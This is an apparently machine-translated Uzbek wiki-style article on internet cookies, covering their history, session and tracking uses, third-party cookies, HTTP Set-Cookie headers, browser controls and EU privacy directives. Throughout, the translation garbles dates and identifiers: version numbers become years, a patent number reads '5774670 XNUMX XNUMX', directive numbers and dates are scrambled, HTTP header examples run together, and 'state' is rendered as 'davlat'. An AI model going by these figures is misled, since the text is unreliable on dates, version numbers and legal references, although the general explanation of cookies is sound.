in Ta'riflar, Wiki

Internet Cookie: bu nima? Ta'rifi, kelib chiqishi, turlari va maxfiyligi

Cookie-ning roli nima, u nima va cookie-fayllarning turlari qanday? 🍪

56.3k Ko'rishlar 384 ovozlar

Internet Cookie: bu nima? Ta'rifi, kelib chiqishi, turlari va maxfiyligi
Internet Cookie: bu nima? Ta'rifi, kelib chiqishi, turlari va maxfiyligi

Un cookie yoki veb-kuki (yoki cookie, deb qisqartirilgan guvoh Kvebekda) HTTP aloqa protokoli bilan HTTP serveri tomonidan HTTP mijoziga yuboriladigan ma'lumotlar ketma-ketligi sifatida aniqlanadi, ikkinchisi ma'lum shartlar ostida bir xil HTTP serveri har safar so'ralganda qaytaradi.

Cookie a ga ekvivalentdir terminalda saqlangan kichik matn fayli Internet foydalanuvchisi. 20 yildan ortiq vaqtdan beri mavjud bo'lib, ular veb-saytlarni ishlab chiquvchilarga navigatsiyani osonlashtirish va muayyan funktsiyalarga ruxsat berish uchun foydalanuvchi ma'lumotlarini saqlashga imkon beradi. Cookie fayllari har doim ko'proq yoki kamroq munozarali bo'lib kelgan, chunki ular uchinchi shaxslar tomonidan ishlatilishi mumkin bo'lgan qoldiq shaxsiy ma'lumotlarni o'z ichiga oladi.

U HTTP sarlavhasi sifatida veb-server tomonidan veb-brauzerga yuboriladi va u har safar serverga kirganda uni o'zgarmagan holda qaytaradi. Cookie-dan foydalanish mumkin autentifikatsiya, sessiya (davlat ta'minoti) va uchun foydalanuvchi haqida aniq ma'lumotlarni saqlash, masalan, sayt afzalliklari yoki elektron xarid qilish savati tarkibi. Cookie atamasi so'zdan olingan sehrli pechene, UNIX hisoblashda taniqli kontseptsiya bo'lib, u brauzer kukilari g'oyasi va nomini ilhomlantirgan. Cookie-fayllarga bir nechta alternativalar mavjud bo'lib, ularning har biri o'z qo'llanilishi, afzalliklari va kamchiliklariga ega.

Oddiy matnli fayllar bo'lgani uchun cookie-fayllar bajarilmaydi. Ular emas na josuslik dasturlari, na viruslar, garchi ba'zi saytlardan cookie-fayllar ko'plab antivirus dasturlari tomonidan aniqlansa ham, ular foydalanuvchilarga bir nechta saytlarga tashrif buyurganlarida kuzatilishiga imkon beradi. 

Ko'pgina zamonaviy brauzerlar foydalanuvchilarga imkon beradi cookie-fayllarni qabul qilish yoki rad etish to'g'risida qaror qabul qiling. Foydalanuvchilar ham mumkin cookie-fayllar qancha vaqt saqlanishini tanlang. Biroq, cookie-fayllarni to'liq rad etish ba'zi saytlarni yaroqsiz holga keltiradi. Masalan, hisob ma'lumotlari (foydalanuvchi nomi va parol) yordamida tizimga kirishni talab qiladigan xarid qilish aravachalarini yoki saytlarni saqlang.

Mundarija

Historique

muddat cookie inglizcha atamadan olingan sehrli pechene, bu dastur qabul qiladigan va o'zgarmagan holda qaytaradigan ma'lumotlar to'plami. Cookie-fayllar ITda allaqachon ishlatilgan Lou Montulli ularni veb-muloqotlarda ishlatish g'oyasi bor edi 1994 iyun oyida. O'sha paytda u mijoz uchun elektron tijorat ilovasini ishlab chiqqan Netscape Communications kompaniyasida ishlagan. Cookie-fayllar do'konning virtual xarid qilish savatini amalga oshirish ishonchliligi muammosini hal qildi.

Jon Giannandrea va Lou Montulli o'sha yili Netscape-ning birinchi cookie spetsifikatsiyasini yozdilar. 0.9-yil 13-oktabrda chiqarilgan Mosaic Netscape-ning 1994 beta-versiyasi, birlashtirilgan cookie texnologiyasi (postga qarang). Cookie-fayllardan birinchi (eksperimental bo'lmagan) foydalanish Netscape veb-saytiga tashrif buyuruvchilar ushbu saytga avval tashrif buyurgan yoki yo'qligini aniqlash edi. Montulli 1995 yilda cookie texnologiyasi uchun patent arizasini topshirdi va AQSh patenti 5774670 XNUMX XNUMX ga berildi. 1998 yilda berilgan.

0.9 yilda Netscape 1994 beta-versiyasida joriy qilingandan so'ng, cookie-fayllar 2 yil oktyabr oyida chiqarilgan Internet Explorer 1995-ga birlashtirildi.

Cookie-fayllarning joriy etilishi hali keng ommaga ma'lum emas. Xususan, cookie-fayllar brauzer sozlamalarida sukut bo'yicha qabul qilingan va foydalanuvchilarga ularning mavjudligi haqida xabar berilmagan. Ba'zi odamlar kukilar mavjudligi haqida 1995 yilning birinchi choragida xabardor bo'lishgan, ammo keng jamoatchilik Financial Times 12 yil 1996 fevralda maqola chop etganidan keyin paydo bo'ldi. O'sha yili cookie fayllari ommaviy axborot vositalarining katta e'tiborini tortdi. mumkin bo'lgan maxfiylik tajovuzlari tufayli. Cookie-fayllar mavzusi 1996 va 1997 yillarda Amerika Federal Savdo Komissiyasining ikkita maslahatlashuvida muhokama qilingan.

Rasmiy cookie spetsifikatsiyasini ishlab chiqish allaqachon boshlangan edi. Rasmiy spetsifikatsiyaning birinchi muhokamalari 1995 yil aprel oyida www-talk pochta ro'yxatida bo'lib o'tdi. Maxsus IETF ishchi guruhi tuzildi. HTTP tranzaktsiyalariga davlat kiritish bo'yicha ikkita muqobil taklif mos ravishda Brayan Behlendorf va Devid Kristol tomonidan taklif qilingan, ammo Kristolning o'zi boshchiligidagi guruh Netscape spetsifikatsiyasidan boshlang'ich nuqta sifatida foydalanishga qaror qildi. 1996 yil fevral oyida ishchi guruh uchinchi tomon cookie fayllari shaxsiy hayotga jiddiy tahdid ekanligini aniqladi. Guruh tomonidan ishlab chiqarilgan spetsifikatsiya oxir-oqibat nashr etildi QRM 2109.

2014 yil oxiridan boshlab biz ko'plab saytlarda cookie-fayllar haqidagi bannerni ko'ramiz. ga ruxsat beruvchi kamida bitta brauzer kengaytmasi mavjud banner ko'rsatilmagan.

Cookie turlari va foydalanish

Sessiya boshqaruvi

Cookie-fayllardan navigatsiya paytida, balki bir nechta tashriflar davomida foydalanuvchi ma'lumotlarini saqlash uchun foydalanish mumkin. Cookie-fayllar elektron xarid qilish aravachalarini, ya'ni foydalanuvchi saytni ko'rish vaqtida sotib olmoqchi bo'lgan narsalarni to'plashi mumkin bo'lgan virtual qurilmani ta'minlash uchun joriy qilingan.

Bu kunlarda xarid qilish aravalari kabi ilovalar o'rniga ma'lumotlar bazasidagi elementlar ro'yxatini serverda saqlaydi, bu afzalroqdir; ularni cookie-faylda saqlashdan ko'ra. Veb-server noyob seans identifikatorini o'z ichiga olgan cookie faylini yuboradi. Keyin veb-brauzer har bir keyingi so'rovda ushbu sessiya identifikatorini qaytaradi va savatdagi elementlar saqlanadi va shu noyob sessiya identifikatori bilan bog'lanadi.

Cookie-fayllardan tez-tez foydalanish hisob ma'lumotlari yordamida saytga kirish uchun foydalidir. Qisqasi, veb-server birinchi navbatda noyob seans identifikatorini o'z ichiga olgan cookie faylini yuboradi. Keyin foydalanuvchilar o'zlarining hisob ma'lumotlarini taqdim etadilar (odatda foydalanuvchi nomi va parol). Keyin veb-ilova sessiyani autentifikatsiya qiladi va foydalanuvchiga xizmatga kirish imkonini beradi.

shaxsiylashtirish

Cookie-fayllar kelajakda unga tegishli tarkibni ko'rsatish uchun sayt foydalanuvchisi haqidagi ma'lumotlarni eslab qolish uchun ishlatilishi mumkin. Masalan, veb-server ushbu veb-saytga kirishda foydalanilgan oxirgi foydalanuvchi nomini o'z ichiga olgan cookie faylini yuborishi mumkin, shunda foydalanuvchi nomi kelgusi tashriflarda oldindan to'ldirilishi mumkin.

Ko'pgina veb-saytlar foydalanuvchi imtiyozlari asosida shaxsiylashtirish uchun cookie-fayllardan foydalanadi. Foydalanuvchilar o'zlarining afzalliklarini shaklda tanlaydilar va ularni serverga yuboradilar. Server cookie-fayldagi afzalliklarni kodlaydi va uni brauzerga qaytarib yuboradi. Keyinchalik, foydalanuvchi ushbu sayt sahifasiga har safar kirganda, brauzer cookie faylini va shuning uchun afzalliklar ro'yxatini qaytaradi; server keyin sahifani foydalanuvchining xohishiga ko'ra sozlashi mumkin. Misol uchun, Vikipediya veb-sayti o'z foydalanuvchilariga o'zlari afzal ko'rgan sayt terisini tanlash imkonini beradi. Google qidiruv tizimi o'z foydalanuvchilariga (ular ro'yxatdan o'tmagan bo'lsa ham) har bir natijalar sahifasida ko'rishni istagan natijalar sonini tanlash imkonini beradi.

Kuzatuv

Kuzatuv cookie-fayllari internet foydalanuvchilarining ko'rish odatlarini kuzatish uchun ishlatiladi. Buni qisman sahifaga soʻrov yuboruvchi kompyuterning IP-manzilidan yoki mijoz har bir soʻrov bilan yuboradigan “yoʻnaltiruvchi” HTTP sarlavhasidan foydalanish orqali ham amalga oshirish mumkin, lekin cookie-fayllar yanada aniqroq boʻlishga imkon beradi. Buni quyidagi misoldagi kabi qilish mumkin:

  1. Agar foydalanuvchi saytdagi sahifani chaqirsa va so'rovda cookie fayli bo'lmasa, server bu foydalanuvchi tashrif buyurgan birinchi sahifa deb hisoblaydi. Keyin server tasodifiy satr yaratadi va uni so'ralgan sahifa bilan birga brauzerga yuboradi.
  2. Shu paytdan boshlab, cookie-fayl brauzer tomonidan har safar saytning yangi sahifasi chaqirilganda avtomatik ravishda yuboriladi. Server odatdagidek sahifani yuboradi, lekin shuningdek, chaqirilgan sahifaning URL manzilini, so'rovning sanasi, vaqti va cookie faylini jurnalga yozib oladi.

Jurnal fayliga qarab, foydalanuvchi qaysi sahifalarga va qanday tartibda tashrif buyurganini ko'rish mumkin. Misol uchun, agar faylda id=abc cookie-faylidan foydalangan holda qilingan bir nechta so'rovlar bo'lsa, bu barcha so'rovlar bir foydalanuvchidan kelganligini ko'rsatishi mumkin. Soʻralgan URL manzili, soʻrovlar bilan bogʻliq sana va vaqt foydalanuvchining koʻrish jarayonini kuzatish imkonini beradi.

Quyida tushuntirilgan uchinchi tomon cookie fayllari va veb-mayoqlari qo'shimcha ravishda turli saytlar bo'ylab kuzatuvni faollashtiradi. Yagona sayt kuzatuvi odatda statistik maqsadlarda qo'llaniladi. Aksincha, uchinchi tomon cookie-fayllari yordamida turli saytlar bo'ylab kuzatuv odatda reklama kompaniyalari tomonidan anonim foydalanuvchi profillarini yaratish uchun ishlatiladi (keyin ular foydalanuvchiga qaysi reklamalar ko'rsatilishi kerakligini aniqlash va unga ushbu reklamalarga mos keladigan elektron pochta xabarlarini yuborish uchun ishlatiladi - SPAM ).

Kuzatuv cookie-fayllari foydalanuvchi shaxsiy hayotiga tajovuz qilish xavfi, lekin ularni osongina o'chirib tashlash mumkin. Ko'pgina zamonaviy brauzerlar ilovani yopish paytida doimiy cookie-fayllarni avtomatik ravishda o'chirish imkoniyatini o'z ichiga oladi.

Uchinchi tomon cookie fayllari

Veb-sahifadagi rasmlar va boshqa ob'ektlar sahifani joylashtirgan serverdan farqli serverlarda bo'lishi mumkin. Sahifani ko'rsatish uchun brauzer ushbu ob'ektlarning barchasini yuklab oladi. Aksariyat veb-saytlar turli manbalardan olingan ma'lumotlarni o'z ichiga oladi. Misol uchun, agar siz brauzeringizga www.example.com ni yozsangiz, ko'pincha sahifaning bir qismida turli manbalardan, ya'ni www. .example.com domenidan boshqa domendan kelgan ob'ektlar yoki reklamalar bo'ladi. "Birinchi" tomon cookie-fayllari brauzerning manzil satrida ko'rsatilgan domen tomonidan o'rnatiladigan cookie-fayllardir. Uchinchi tomon cookie-fayllari boshqa domendan kelgan sahifa obyektlaridan biri tomonidan o'rnatiladi.

Odatiy bo'lib, Mozilla Firefox, Microsoft Internet Explorer va Opera kabi brauzerlar uchinchi tomon cookie-fayllarini qabul qiladi, biroq foydalanuvchilar ularni bloklash uchun brauzer sozlamalaridagi sozlamalarni o'zgartirishi mumkin. Veb-funksionallikni ta'minlaydigan uchinchi tomon cookie-fayllariga xos xavfsizlik xavfi yo'q, ammo ular foydalanuvchilarni kuzatish uchun ham qo'llaniladi. saytdan saytga.

Ghostery kabi barcha brauzerlar, shu jumladan Google Chrome uchun mavjud vositalar uchinchi tomonlar o'rtasidagi almashinuvni bloklashi mumkin.

Amalga oshirish

Veb-brauzer va veb-sahifani joylashtirgan server o'rtasidagi mumkin bo'lgan o'zaro ta'sir. Server brauzerga cookie faylini yuboradi va brauzer boshqa sahifaga qo'ng'iroq qilganda uni qaytarib yuboradi.
Veb-brauzer va veb-sahifani joylashtirgan server o'rtasidagi mumkin bo'lgan o'zaro ta'sir. Server brauzerga cookie faylini yuboradi va brauzer boshqa sahifaga qo'ng'iroq qilganda uni qaytarib yuboradi.

Cookie-fayllar - bu veb-server tomonidan brauzerga yuboriladigan kichik ma'lumotlar. Brauzer ularni o'zgarmagan holda serverga qaytaradi va davlat (o'tmishdagi voqealar xotirasi) aks holda fuqaroligi bo'lmagan HTTP tranzaksiyasiga kiritadi. Cookie-fayllarsiz, veb-sahifani yoki veb-sahifaning tarkibiy qismini har bir izlash bir xil saytga qilingan boshqa so'rovlardan mustaqil ravishda alohida hodisa hisoblanadi. Cookie-fayllar veb-server tomonidan o'rnatilishidan tashqari, brauzer tomonidan qo'llab-quvvatlansa va ruxsat berilsa, JavaScript kabi skript tillari orqali ham o'rnatilishi mumkin.

Rasmiy cookie spetsifikatsiyasi shuni ko'rsatadiki, brauzerlar minimal miqdordagi cookie fayllarini saqlash va qayta yuborish imkoniyatiga ega bo'lishi kerak. Xususan, brauzer har biri to‘rt kilobaytdan iborat kamida 300 ta cookie faylini va bitta server yoki domen uchun kamida 20 ta cookie-faylni saqlashi kerak.

3.1-bandiga muvofiq QRM 2965, cookie fayllari nomlari katta-kichik harflarga sezgir emas.

Cookie uning amal qilish muddatini belgilashi mumkin, bu holda cookie shu sanada o'chiriladi. Agar cookie-faylda amal qilish muddati ko'rsatilmagan bo'lsa, foydalanuvchi o'z brauzerini tark etishi bilanoq cookie o'chiriladi. Shuning uchun, amal qilish muddatini belgilash cookie-faylni bir necha seanslar orqali saqlab qolishning bir usuli hisoblanadi. Shu sababli, yaroqlilik muddati bo'lgan cookie fayllari aytiladi barqaror. Ilovaga misol: chakana savdo sayti foydalanuvchilar savatiga joylashtirgan narsalarni yozib olish uchun doimiy cookie-fayllardan foydalanishi mumkin (aslida cookie kompyuteringizda emas, sotuv saytidagi maʼlumotlar bazasida saqlangan yozuvga ishora qilishi mumkin) . Bu orqali, agar foydalanuvchilar xarid qilmasdan brauzerni tark etib, keyinroq unga qaytsalar, savatdagi narsalarni yana topishlari mumkin bo‘ladi. Agar ushbu cookie-fayllar yaroqlilik muddatini ko'rsatmagan bo'lsa, brauzer yopilganda ularning amal qilish muddati tugaydi va savat tarkibidagi ma'lumotlar yo'qoladi.

Cookie-fayllar ularni yaratgan serverdagi ma'lum bir domen, subdomen yoki yo'l bilan chegaralanishi mumkin.

Veb-sahifalarni uzatish HyperText Transfer Protocol (HTTP) yordamida amalga oshiriladi. Cookie-fayllarni e'tiborsiz qoldirgan holda, brauzerlar veb-serverlardan sahifaga qo'ng'iroq qilishadi, odatda ularga qisqa matnni yuboradilar HTTP so'rovi. Masalan, www.example.org/index.html sahifasiga kirish uchun brauzerlar www.example.org serveriga ulanadi va quyidagi ko‘rinishdagi so‘rov yuboradi:

GET /index.html HTTP/1.1Xost: www.example.org
Navigateurserver

Server so'ralgan sahifani yuborish orqali javob beradi, undan oldin shunga o'xshash matn qo'ng'iroq qilinadi HTTP javobi. Ushbu paket brauzerga cookie-fayllarni saqlashni ko'rsatuvchi qatorlarni o'z ichiga olishi mumkin:

HTTP/1.1 200 OKKontent turi: matn/htmlSet-Cookie: nom=qiymat
(HTML sahifasi)
Navigateurserver

Agar server brauzerdan cookie-fayllarni saqlashni xohlasa, server faqat Cookie-ni sozlash qatorini yuboradi. Set-Cookie brauzer uchun name=value qatorini saqlash va uni serverga keyingi barcha soʻrovlarda qaytarish soʻrovidir. Agar brauzer cookie-fayllarni qo'llab-quvvatlasa va cookie-fayllar brauzer opsiyalarida yoqilgan bo'lsa, cookie fayli bir xil serverga qilingan barcha keyingi so'rovlarga kiritiladi. Masalan, brauzer www.example.org/news.html sahifasini www.example.org serveriga quyidagi so'rovni yuborish orqali chaqiradi:

OLISH /news.html HTTP/1.1Xost: www.example.orgCookie: name=valueQabul qilish: */*
Navigateurserver

Bu xuddi shu serverdan boshqa sahifaga so'rov bo'lib, yuqoridagi birinchisidan farq qiladi, chunki u server avvalroq brauzerga yuborgan qatorni o'z ichiga oladi. Ushbu vosita tufayli server bu so'rov avvalgisiga bog'langanligini biladi. Server chaqirilgan sahifani yuborish va unga boshqa cookie-fayllarni qo'shish orqali javob beradi.

Cookie qiymati server tomonidan chaqirilgan sahifaga javoban Set-Cookie: name=new_value yangi qatorini yuborish orqali o'zgartirilishi mumkin. Keyin brauzer eski qiymatni yangisiga almashtiradi.

Set-Cookie liniyasi odatda HTTP serveri tomonidan emas, balki CGI dasturi yoki boshqa skript tili tomonidan yaratiladi. HTTP serveri (misol: Apache) faqat dastur natijasini (cookie-fayllarni o'z ichiga olgan sarlavha oldidagi hujjat) brauzerga uzatadi.

Cookie-fayllarni JavaScript yoki brauzerda ishlaydigan boshqa shunga o'xshash tillar, ya'ni server tomonida emas, balki mijoz tomonida o'rnatish mumkin. JavaScript-da bu maqsadda document.cookie obyektidan foydalaniladi. Misol uchun, document.cookie = "temperature=20" bayonoti "temperature" nomli va qiymati 20 bo'lgan cookie faylini yaratadi.

Atributlar bilan cookie-fayllarni o'rnatuvchi google.com saytidan HTTP javobiga misol.
Atributlar bilan cookie-fayllarni o'rnatuvchi google.com saytidan HTTP javobiga misol.

Nom/qiymat juftligiga qo'shimcha ravishda cookie-faylda amal qilish muddati, yo'l, domen nomi va mo'ljallangan ulanish turi, ya'ni oddiy yoki shifrlangan bo'lishi mumkin. RFC 2965, shuningdek, cookie-fayllar majburiy versiya raqamiga ega bo'lishi kerakligini belgilaydi, ammo bu odatda o'tkazib yuboriladi. Ushbu ma'lumotlar qismlari name=new_value juftligiga amal qiladi va nuqta-vergul bilan ajratiladi. Masalan, cookie-fayl server tomonidan Set-Cookie qatorini yuborish orqali yaratilishi mumkin: name=new_value; tugashi = sana; yo'l=/; domen=.example.org.

Cookie fayllari muddati tugaydi va quyidagi hollarda brauzer tomonidan serverga yuborilmaydi:

  • Brauzer yopilganda, agar cookie doimiy bo'lmasa.
  • Cookie-ning amal qilish muddati o'tganda.
  • Cookie-faylning amal qilish muddati (server yoki skript tomonidan) o'tmishdagi sanaga o'zgartirilganda.
  • Brauzer foydalanuvchining iltimosiga binoan cookie-faylni o'chirib tashlaganida.

Uchinchi holat serverlar yoki skriptlarga cookie-fayllarni aniq o'chirish imkonini beradi. E'tibor bering, Google Chrome veb-brauzerida kontent sozlamalariga kirish orqali ma'lum bir cookie-faylning amal qilish muddatini bilish mumkin. Kompyuterda saqlangan cookie fayli, agar uni o'chirish uchun hech qanday protsedura bajarilmasa, u erda bir necha o'n yillar davomida saqlanishi mumkin.

Stereotiplar

Ular Internetda paydo bo'lganidan beri, cookie-fayllar haqida ko'plab fikrlar Internetda va ommaviy axborot vositalarida tarqaldi. 1998 yilda CIAC, Amerika Qo'shma Shtatlari Energetika Departamenti kompyuter hodisalari monitoringi guruhi cookie fayllari xavfsizligi zaifliklari "aslida mavjud emas" ekanligini aniqladi va "siz tashrif buyurgan veb-sahifalaringizning kelib chiqishi haqida ma'lumot va siz tashrif buyurgan veb-sahifalarning tafsilotlari haqida ma'lumot" deb tushuntirdi. allaqachon veb-serverlarning jurnal fayllarida mavjud. 2005 yilda Jupiter Research tadqiqot natijalarini e'lon qildi, unda respondentlarning katta qismi quyidagi bayonotlarni ko'rib chiqdi:

  • Cookie-fayllar o'xshaydi virus, ular foydalanuvchilarning qattiq disklarini yuqtirishadi.
  • Cookie-fayllar yaratiladi up pop.
  • Cookie-fayllar yuborish uchun ishlatiladi spam.
  • Cookie fayllari faqat reklama uchun ishlatiladi.

Cookie-fayllar foydalanuvchi kompyuteridagi ma'lumotlarni o'chira olmaydi yoki o'qiy olmaydi. Biroq, cookie-fayllar ma'lum bir sayt yoki saytlar to'plamida foydalanuvchi tashrif buyurgan veb-sahifalarni aniqlash imkonini beradi. Ushbu ma'lumot uchinchi shaxslarga ishlatilishi yoki qayta sotilishi mumkin bo'lgan foydalanuvchi profilida to'planishi mumkin, bu esa maxfiylik bilan bog'liq jiddiy muammolarni keltirib chiqarishi mumkin. Ba'zi profillar anonimdir, ya'ni ular shaxsiy ma'lumotlarni o'z ichiga olmaydi, ammo bunday profillar ham shubhali bo'lishi mumkin.

Xuddi shu tadqiqotga ko'ra, Internet foydalanuvchilarining katta foizi cookie fayllarini qanday o'chirishni bilishmaydi. Odamlarning cookie-fayllarga ishonmasligining sabablaridan biri shundaki, ba'zi saytlar cookie-fayllarning shaxsni aniqlash xususiyatini suiiste'mol qilgan va bu ma'lumotlarni boshqa manbalar bilan baham ko'rgan. Spam deb hisoblangan maqsadli reklama va kiruvchi elektron pochta xabarlarining katta qismi kukilarni kuzatish natijasida olingan maʼlumotlardan kelib chiqadi.

Brauzer sozlamalari

Ko'pgina brauzerlar cookie-fayllarni qo'llab-quvvatlaydi va foydalanuvchiga ularni o'chirishga ruxsat beradi. Eng keng tarqalgan variantlar:

  • Cookie-fayllarni butunlay yoqing yoki o'chiring, shunda ular doimo qabul qilinadi yoki bloklanadi.
  • Brauzerning manzil satriga javascript: alert(document.cookie) ni kiritish orqali foydalanuvchiga berilgan sahifadagi faol cookie-fayllarni ko‘rishiga ruxsat bering. Ba'zi brauzerlar foydalanuvchi uchun brauzer tomonidan saqlangan cookie-fayllarni ko'rishi va tanlab o'chirishi mumkin bo'lgan cookie-fayllar menejerini o'z ichiga oladi.

Aksariyat brauzerlar shuningdek, cookie-fayllarni o'z ichiga olgan shaxsiy ma'lumotlarni to'liq o'chirishga ruxsat beradi. Cookie ruxsatlarini boshqarish uchun qo'shimcha modullar ham mavjud.

Maxfiylik va uchinchi tomon cookie-fayllari

Ushbu xayoliy misolda reklama kompaniyasi ikkita veb-saytga bannerlar joylashtirgan. Bannerlarni o'z serverlarida joylashtirish va uchinchi tomon cookie-fayllaridan foydalanish orqali reklama kompaniyasi ushbu ikki sayt orqali foydalanuvchining navigatsiyasini kuzatishi mumkin.

Cookie-fayllar veb-foydalanuvchilarning maxfiyligi va anonimligi uchun muhim ahamiyatga ega. Cookie fayllari faqat ularni o'rnatgan serverga yoki bir xil Internet domeniga tegishli serverga qaytarilsa-da, veb-sahifada boshqa domenlarga tegishli serverlarda saqlangan tasvirlar yoki boshqa komponentlar bo'lishi mumkin. Ushbu tashqi komponentlarni qayta tiklash paytida o'rnatiladigan cookie fayllari deyiladi uchinchi tomon cookie fayllari. Bunga kiruvchi qalqib chiquvchi oynalardagi kukilar kiradi.

Reklama kompaniyalari foydalanuvchilarni tashrif buyurgan turli saytlarda kuzatish uchun uchinchi tomon cookie-fayllaridan foydalanadi. Xususan, reklama kompaniyasi foydalanuvchini reklama tasvirlarini yoki kuzatuv pikselini joylashtirgan barcha sahifalarda kuzatishi mumkin. Foydalanuvchi tomonidan tashrif buyurilgan sahifalarni bilish reklama kompaniyasiga foydalanuvchining reklama afzalliklarini yo'naltirishga imkon beradi.

Ba'zilar foydalanuvchi profilini yaratish qobiliyatini maxfiylikka tajovuz deb hisoblashadi, ayniqsa kuzatuv uchinchi tomon cookie-fayllari yordamida turli domenlarda amalga oshirilganda. Shu sababli, ba'zi mamlakatlarda cookie qonunchiligi mavjud.

Qo'shma Shtatlar hukumati 2000 yilda Oq uyning giyohvand moddalar siyosati boshqarmasi giyohvand moddalar bo'yicha onlayn reklamalarni ko'rayotgan foydalanuvchilarning kompyuterlarini kuzatish uchun cookie-fayllardan foydalangani ma'lum bo'lgach, kukilarni joylashtirish bo'yicha qat'iy qoidalarni joriy qildi. 2002 yilda maxfiylik faoli Daniel Brandt Markaziy razvedka boshqarmasi o'z veb-saytlariga tashrif buyurgan kompyuterlarda doimiy cookie-fayllarni qoldirishini aniqladi. Ushbu qoidabuzarlik haqida xabardor bo'lgach, Markaziy razvedka boshqarmasi ushbu cookie-fayllar ataylab yuborilmaganligini e'lon qildi va ularni o'rnatishni to'xtatdi. 25 yil 2005 dekabrda Brandt Milliy xavfsizlik agentligi (NSA) dasturiy ta'minot yangilanishi tufayli tashrif buyuruvchilarning kompyuterlarida ikkita doimiy cookie-fayllarni qoldirganini aniqladi. Ogohlantirishdan so'ng, NSA darhol cookie-fayllarni o'chirib qo'ydi.

Buyuk Britaniyada, Cookie qonuni ", 25 yil 2012 mayda kuchga kirgan, saytlarni o'z niyatlarini e'lon qilishga majbur qiladi, bu esa foydalanuvchilarga Internetda o'z izlarini qoldirish yoki qoldirmaslikni tanlash imkonini beradi. Shunday qilib, ular reklama maqsadliligidan himoyalangan bo'lishi mumkin. Biroq, ga binoan Guardian, Internet foydalanuvchilarining roziligi aniq bo'lishi shart emas; foydalanuvchi roziligi shartlariga o'zgartirishlar kiritildi, uni qilish shunday nazarda tutilgan.

Maxfiylik to'g'risidagi 2002/58 direktivasi

Maxfiylik va elektron aloqalar bo'yicha 202/58 direktivasi cookie-fayllardan foydalanish qoidalarini o'z ichiga oladi. Xususan, ushbu direktivaning 5-moddasi 3-bandi foydalanuvchi kompyuterida maʼlumotlarni (masalan, cookie-fayllar) saqlash faqat quyidagi hollarda amalga oshirilishini talab qiladi:

  • foydalanuvchi ma'lumotlardan qanday foydalanilganligi to'g'risida xabardor qilinadi;
  • foydalanuvchiga ushbu saqlash operatsiyasini rad etish imkoniyati beriladi. Shu bilan birga, ushbu moddada ma'lumotlarni texnik sabablarga ko'ra saqlash ushbu qonundan ozod qilinganligi ham ko'rsatilgan.

2003 yil oktabr oyidan amalga oshirilganligi sababli, direktiva 2004 yil dekabr oyidagi hisobotga ko'ra juda nomukammal tarzda amalda qo'llanildi va unda ba'zi a'zo davlatlar (Slovakiya, Latviya, Gretsiya, Belgiya va Lyuksemburg) hali ham qonun hujjatlarini o'zgartirmaganligini ta'kidladi. ichki qonunchilikka direktiv.

G29ning 2010 yildagi fikriga ko'ra, internet foydalanuvchisining ochiq roziligi bilan xulq-atvorli reklama maqsadlarida cookie-fayllardan foydalanishni talab qiluvchi ushbu direktiva juda yomon qo'llaniladi. Darhaqiqat, ko'pchilik saytlar buni direktivaga mos kelmaydigan tarzda, o'zlarini "cookie" lardan foydalanish haqida ma'lumot beruvchi oddiy "banner" bilan cheklab, foydalanish haqida ma'lumot bermasdan, "texnik" cookie-fayllarni farqlamasdan qiladilar. “kuzatuv” cookie-fayllarini, shuningdek, texnik cookie-fayllarni (masalan, xarid qilish savatini boshqarish cookie-fayllarini) saqlashni va “kuzatish”ni rad etishni istagan foydalanuvchiga haqiqiy tanlov taklif qilish. Aslida, agar cookie-fayllar rad etilsa, ko'plab saytlar to'g'ri ishlamaydi, bu 2002/58 direktivasiga yoki 95/46 (Shaxsiy ma'lumotlarni himoya qilish) direktivasiga mos kelmaydi.

Direktiv 2009/136/CE

Ushbu material 2009 yil 136 noyabrdagi 25/2009/EC direktivasi bilan yangilangan bo'lib, unda "abonent yoki foydalanuvchining terminal uskunasida ma'lumotni saqlash yoki allaqachon saqlangan ma'lumotlarga kirish huquqiga ega bo'lish faqat quyidagi shartlar bilan ruxsat etiladi" deb ta'kidlangan. abonent yoki foydalanuvchi, 95/46/EC direktivasiga muvofiq, ishlov berish maqsadlari to'g'risida boshqalar o'rtasida aniq va to'liq ma'lumotni olganidan keyin o'z roziligini bergan. Shuning uchun yangi direktiva Internet foydalanuvchisining kompyuteriga cookie-fayllarni joylashtirishdan oldingi majburiyatlarni kuchaytiradi.

Direktivning dastlabki mulohazalarida, Evropa qonun chiqaruvchisi shuni aniqlaydi: "95/46/EC direktivasining tegishli qoidalariga muvofiq, texnik jihatdan mumkin va samarali bo'lsa, foydalanuvchining qayta ishlashga roziligi brauzer yoki boshqa dasturning tegishli sozlamalaridan foydalanish”. Lekin, aslida, hozirgi kunga qadar hech bir brauzer asosiy texnik cookie-fayllarni ixtiyoriylaridan ajratib olishga imkon bermaydi, ularni foydalanuvchi o'z ixtiyoriga qoldirishi kerak.

Ushbu yangi ko'rsatma Belgiya deputatlari tomonidan 2012 yil iyul oyida o'zgartirilgan. 2014 yilgi tadqiqot shuni ko'rsatadiki, hatto deputatlar ham amal qilishda qiynalmoqda. direktivaning cheklovlari.

P3P

P3P spetsifikatsiyasi serverning maxfiylik siyosatini belgilash qobiliyatini o'z ichiga oladi, u qanday turdagi ma'lumotlarni va qanday maqsadda to'plashini belgilaydi. Ushbu siyosatlar cookie-fayllar yordamida to'plangan ma'lumotlardan foydalanishni o'z ichiga oladi (lekin ular bilan cheklanmaydi). P3P ta'riflariga ko'ra, brauzer maxfiylik siyosatini foydalanuvchining afzalliklari bilan taqqoslash yoki foydalanuvchidan so'rash, server tomonidan e'lon qilingan maxfiylik siyosati maxfiylik bayonotini taqdim etish orqali cookie-fayllarni qabul qilishi yoki rad qilishi mumkin.

Ko'pgina brauzerlar, jumladan Apple Safari va Microsoft Internet Explorer 6 va 7 versiyalari P3P-ni qo'llab-quvvatlaydi, bu brauzerga uchinchi tomon cookie fayllarini saqlashni qabul qilish yoki qabul qilishni aniqlash imkonini beradi. Opera brauzeri foydalanuvchilarga uchinchi tomon cookie-fayllarini rad etish va Internet domenlari uchun global va maxsus xavfsizlik profilini yaratish imkonini beradi. Mozilla Firefox-ning 2-versiyasi P3P-ni qo'llab-quvvatlashni to'xtatdi, lekin uni 3-versiyada tikladi.

